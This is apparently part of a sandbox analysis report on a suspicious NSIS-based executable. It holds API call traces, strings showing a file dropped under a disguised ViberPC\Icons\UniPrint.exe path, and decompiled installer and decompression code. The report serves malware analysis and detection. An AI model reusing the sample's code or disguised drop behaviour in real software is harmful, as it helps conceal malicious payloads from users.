                                                                                                        0x00403424
                                                                                                        0x004033d2
                                                                                                        0x004033df
                                                                                                        0x004033d6
                                                                                                        0x004033dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004033de
                                                                                                        0x004033de
                                                                                                        0x004033de
                                                                                                        0x004033e3
                                                                                                        0x004033e5
                                                                                                        0x004033ed
                                                                                                        0x00403453
                                                                                                        0x00403458
                                                                                                        0x00403459
                                                                                                        0x00403463
                                                                                                        0x00403464
                                                                                                        0x0040346d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403471
                                                                                                        0x00403478
                                                                                                        0x0040347e
                                                                                                        0x00403484
                                                                                                        0x0040348c
                                                                                                        0x0040348c
                                                                                                        0x0040349a
                                                                                                        0x004034a1
                                                                                                        0x004034aa
                                                                                                        0x004034b0
                                                                                                        0x004034bc
                                                                                                        0x004034c2
                                                                                                        0x004034cc
                                                                                                        0x004034e0
                                                                                                        0x004034e1
                                                                                                        0x004034e2
                                                                                                        0x004034f3
                                                                                                        0x004034f9
                                                                                                        0x00403500
                                                                                                        0x00403503
                                                                                                        0x00403509
                                                                                                        0x00403509
                                                                                                        0x00403500
                                                                                                        0x0040350d
                                                                                                        0x00403513
                                                                                                        0x00403513
                                                                                                        0x00403516
                                                                                                        0x00403517
                                                                                                        0x00403518
                                                                                                        0x00000000
                                                                                                        0x00403518
                                                                                                        0x004033ef
                                                                                                        0x004033f1
                                                                                                        0x004033fc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403404
                                                                                                        0x0040340f
                                                                                                        0x00403414
                                                                                                        0x00000000
                                                                                                        0x00403414
                                                                                                        0x00403390
                                                                                                        0x00403396
                                                                                                        0x0040339b
                                                                                                        0x0040339c
                                                                                                        0x004033a1
                                                                                                        0x004033a6
                                                                                                        0x004033a8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004033a8
                                                                                                        0x00000000
                                                                                                        0x00403345
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004032f9
                                                                                                        0x004032f9
                                                                                                        0x004032f9
                                                                                                        0x004032fa
                                                                                                        0x004032fa
                                                                                                        0x00000000
                                                                                                        0x004032f9
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • 7414E7F0.COMCTL32 ref: 0040325B
                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        • SHGetFileInfo.SHELL32(0041F458,00000000,?,00000160,00000000), ref: 00403295
                                                                                                          • Part of subcall function 00405B66: lstrcpyn.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                        • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\wogZe27GBB.exe" ,00000000), ref: 004032BD
                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\wogZe27GBB.exe" ,00000020), ref: 004032E8
                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                        • lstrcat.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 00403428
                                                                                                        • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                        • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                        • lstrcat.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 00403459
                                                                                                        • lstrcmpi.KERNEL32 ref: 00403465
                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                        • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\wogZe27GBB.exe,0041F058,00000001), ref: 004034D6
                                                                                                        • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                        • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$7414AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                        • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\wogZe27GBB.exe" $1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\ViberPC\Icons$C:\Users\user\AppData\Roaming\ViberPC\Icons$C:\Users\user\Desktop$C:\Users\user\Desktop\wogZe27GBB.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                        • API String ID: 2012079721-2734004487
                                                                                                        • Opcode ID: 96a31a09bc8c05a7c789ea61c22a0fe7a9ca37f66bcd4d3ddf1a0d24bca330c8
                                                                                                        • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                        • Opcode Fuzzy Hash: 96a31a09bc8c05a7c789ea61c22a0fe7a9ca37f66bcd4d3ddf1a0d24bca330c8
                                                                                                        • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t45;
				char _t46;
				char _t48;
				int _t49;
				char _t51;
				void* _t59;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				char _t79;
				void* _t81;
				CHAR* _t82;
				void* _t84;
				signed int _t91;
				signed int _t93;
				void* _t94;

				_t84 = __esi;
				_t81 = __edi;
				_t59 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t70 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t59);
				_push(_t84);
				_push(_t81);
				_t82 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t82 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t79 =  *_t70;
					if(_t79 == 0) {
						break;
					}
					__eflags = _t82 - _t37 - 0x400;
					if(_t82 - _t37 >= 0x400) {
						break;
					}
					_t70 = _t70 + 1;
					__eflags = _t79 - 0xfc;
					_a8 = _t70;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t82 = _t79;
							_t82 =  &(_t82[1]);
							__eflags = _t82;
						} else {
							 *_t82 =  *_t70;
							_t82 =  &(_t82[1]);
							_t70 = _t70 + 1;
						}
						continue;
					}
					_t39 =  *(_t70 + 1);
					_t71 =  *_t70;
					_t91 = (_t39 & 0x0000007f) << 0x00000007 | _t71 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t71 | 0x00000080;
					_t65 = _t71;
					_v24 = _t65;
					__eflags = _t79 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t79 != 0xfe) {
						__eflags = _t79 - 0xfd;
						if(_t79 != 0xfd) {
							__eflags = _t79 - 0xff;
							if(_t79 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t91;
								_t39 = E00405B88(_t65, _t82, _t91, _t82, (_t39 | 0xffffffff) - _t91);
							}
							L41:
							_push(_t82);
							L00405B7C();
							_t70 = _a8;
							_t82 =  &(_t82[_t39]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t91 - 0x1d;
						if(_t91 != 0x1d) {
							__eflags = (_t91 << 0xa) + 0x424000;
							_t39 = E00405B66(_t82, (_t91 << 0xa) + 0x424000);
						} else {
							_t39 = E00405AC4(_t82,  *0x423ea8);
						}
						__eflags = _t91 + 0xffffffeb - 7;
						if(_t91 + 0xffffffeb < 7) {
							L32:
							_t39 = E00405DC8(_t82);
						}
						goto L41;
					}
					_t93 = 2;
					_t45 = GetVersion();
					__eflags = _t45;
					if(_t45 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t93 = 4;
						}
						__eflags = _t65;
						if(_t65 >= 0) {
							__eflags = _t65 - 0x25;
							if(_t65 != 0x25) {
								__eflags = _t65 - 0x24;
								if(_t65 == 0x24) {
									GetWindowsDirectoryA(_t82, 0x400);
									_t93 = 0;
								}
								while(1) {
									__eflags = _t93;
									if(_t93 == 0) {
										goto L29;
									}
									_t46 =  *0x423ea4;
									_t93 = _t93 - 1;
									__eflags = _t46;
									if(_t46 == 0) {
										L25:
										_t48 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t94 + _t93 * 4 - 0x18),  &_v12);
										__eflags = _t48;
										if(_t48 != 0) {
											L27:
											 *_t82 =  *_t82 & 0x00000000;
											__eflags =  *_t82;
											continue;
										}
										_t49 = SHGetPathFromIDList(_v12, _t82);
										 *0x407278(_v12);
										__eflags = _t49;
										if(_t49 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t51 =  *_t46( *0x423ea8,  *(_t94 + _t93 * 4 - 0x18), 0, 0, _t82); // executed
									__eflags = _t51;
									if(_t51 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t82, 0x400);
							goto L29;
						} else {
							_t68 = (_t65 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t65 & 0x0000003f) +  *0x423ed8, _t82, _t65 & 0x00000040);
							__eflags =  *_t82;
							if( *_t82 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									_push("\\Microsoft\\Internet Explorer\\Quick Launch");
									_push(_t82);
									L00405B82();
								}
								goto L32;
							}
							E00405B88(_t68, _t82, _t93, _t82, _v16);
							L29:
							__eflags =  *_t82;
							if( *_t82 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t45 - 0x5a04;
					if(_t45 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t82 =  *_t82 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                                        0x00405b88
                                                                                                        0x00405b88
                                                                                                        0x00405b88
                                                                                                        0x00405b8e
                                                                                                        0x00405b93
                                                                                                        0x00405ba4
                                                                                                        0x00405ba4
                                                                                                        0x00405baf
                                                                                                        0x00405bb1
                                                                                                        0x00405bb6
                                                                                                        0x00405bb9
                                                                                                        0x00405bba
                                                                                                        0x00405bc1
                                                                                                        0x00405bc3
                                                                                                        0x00405bc9
                                                                                                        0x00405bcc
                                                                                                        0x00405bcc
                                                                                                        0x00405da5
                                                                                                        0x00405da5
                                                                                                        0x00405da9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405bd9
                                                                                                        0x00405bdf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405be5
                                                                                                        0x00405be6
                                                                                                        0x00405be9
                                                                                                        0x00405bec
                                                                                                        0x00405d98
                                                                                                        0x00405da2
                                                                                                        0x00405da4
                                                                                                        0x00405da4
                                                                                                        0x00405d9a
                                                                                                        0x00405d9c
                                                                                                        0x00405d9e
                                                                                                        0x00405d9f
                                                                                                        0x00405d9f
                                                                                                        0x00000000
                                                                                                        0x00405d98
                                                                                                        0x00405bf2
                                                                                                        0x00405bf6
                                                                                                        0x00405c06
                                                                                                        0x00405c0a
                                                                                                        0x00405c11
                                                                                                        0x00405c14
                                                                                                        0x00405c18
                                                                                                        0x00405c1e
                                                                                                        0x00405c21
                                                                                                        0x00405c24
                                                                                                        0x00405c27
                                                                                                        0x00405d42
                                                                                                        0x00405d45
                                                                                                        0x00405d75
                                                                                                        0x00405d78
                                                                                                        0x00405d7d
                                                                                                        0x00405d81
                                                                                                        0x00405d81
                                                                                                        0x00405d86
                                                                                                        0x00405d86
                                                                                                        0x00405d87
                                                                                                        0x00405d8c
                                                                                                        0x00405d8f
                                                                                                        0x00405d91
                                                                                                        0x00000000
                                                                                                        0x00405d91
                                                                                                        0x00405d47
                                                                                                        0x00405d4a
                                                                                                        0x00405d5f
                                                                                                        0x00405d66
                                                                                                        0x00405d4c
                                                                                                        0x00405d53
                                                                                                        0x00405d53
                                                                                                        0x00405d6e
                                                                                                        0x00405d71
                                                                                                        0x00405d3a
                                                                                                        0x00405d3b
                                                                                                        0x00405d3b
                                                                                                        0x00000000
                                                                                                        0x00405d71
                                                                                                        0x00405c2f
                                                                                                        0x00405c30
                                                                                                        0x00405c36
                                                                                                        0x00405c38
                                                                                                        0x00405c52
                                                                                                        0x00405c52
                                                                                                        0x00405c59
                                                                                                        0x00405c59
                                                                                                        0x00405c60
                                                                                                        0x00405c64
                                                                                                        0x00405c64
                                                                                                        0x00405c65
                                                                                                        0x00405c67
                                                                                                        0x00405ca0
                                                                                                        0x00405ca3
                                                                                                        0x00405cb3
                                                                                                        0x00405cb6
                                                                                                        0x00405cbe
                                                                                                        0x00405cc4
                                                                                                        0x00405cc4
                                                                                                        0x00405d20
                                                                                                        0x00405d20
                                                                                                        0x00405d22
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cc8
                                                                                                        0x00405ccf
                                                                                                        0x00405cd0
                                                                                                        0x00405cd2
                                                                                                        0x00405cec
                                                                                                        0x00405cfa
                                                                                                        0x00405d00
                                                                                                        0x00405d02
                                                                                                        0x00405d1d
                                                                                                        0x00405d1d
                                                                                                        0x00405d1d
                                                                                                        0x00000000
                                                                                                        0x00405d1d
                                                                                                        0x00405d08
                                                                                                        0x00405d13
                                                                                                        0x00405d19
                                                                                                        0x00405d1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405d1b
                                                                                                        0x00405cd4
                                                                                                        0x00405cd7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405ce6
                                                                                                        0x00405ce8
                                                                                                        0x00405cea
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cea
                                                                                                        0x00000000
                                                                                                        0x00405d20
                                                                                                        0x00405cab
                                                                                                        0x00000000
                                                                                                        0x00405c69
                                                                                                        0x00405c6e
                                                                                                        0x00405c84
                                                                                                        0x00405c89
                                                                                                        0x00405c8c
                                                                                                        0x00405d29
                                                                                                        0x00405d29
                                                                                                        0x00405d2d
                                                                                                        0x00405d2f
                                                                                                        0x00405d34
                                                                                                        0x00405d35
                                                                                                        0x00405d35
                                                                                                        0x00000000
                                                                                                        0x00405d2d
                                                                                                        0x00405c96
                                                                                                        0x00405d24
                                                                                                        0x00405d24
                                                                                                        0x00405d27
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405d27
                                                                                                        0x00405c67
                                                                                                        0x00405c3a
                                                                                                        0x00405c3e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405c40
                                                                                                        0x00405c44
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405c46
                                                                                                        0x00405c4a
                                                                                                        0x00000000
                                                                                                        0x00405c4c
                                                                                                        0x00405c4c
                                                                                                        0x00000000
                                                                                                        0x00405c4c
                                                                                                        0x00405c4a
                                                                                                        0x00405daf
                                                                                                        0x00405db9
                                                                                                        0x00405dc5
                                                                                                        0x00405dc5
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                        • GetWindowsDirectoryA.KERNEL32( "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe",00000400), ref: 00405CBE
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                        • SHGetPathFromIDList.SHELL32(00000000, "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"), ref: 00405D08
                                                                                                        • 74E3A680.OLE32(00000000), ref: 00405D13
                                                                                                        • lstrcat.KERNEL32( "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                        • lstrlen.KERNEL32( "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe",?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Directory$A680FolderFromListLocationPathSpecialSystemVersionWindowslstrcatlstrlen
                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                        • API String ID: 2738003839-557772605
                                                                                                        • Opcode ID: ca0249d5f4d71674562d458b63bf6447001add47325df02e3d4ad3532f05c4cf
                                                                                                        • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                        • Opcode Fuzzy Hash: ca0249d5f4d71674562d458b63bf6447001add47325df02e3d4ad3532f05c4cf
                                                                                                        • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
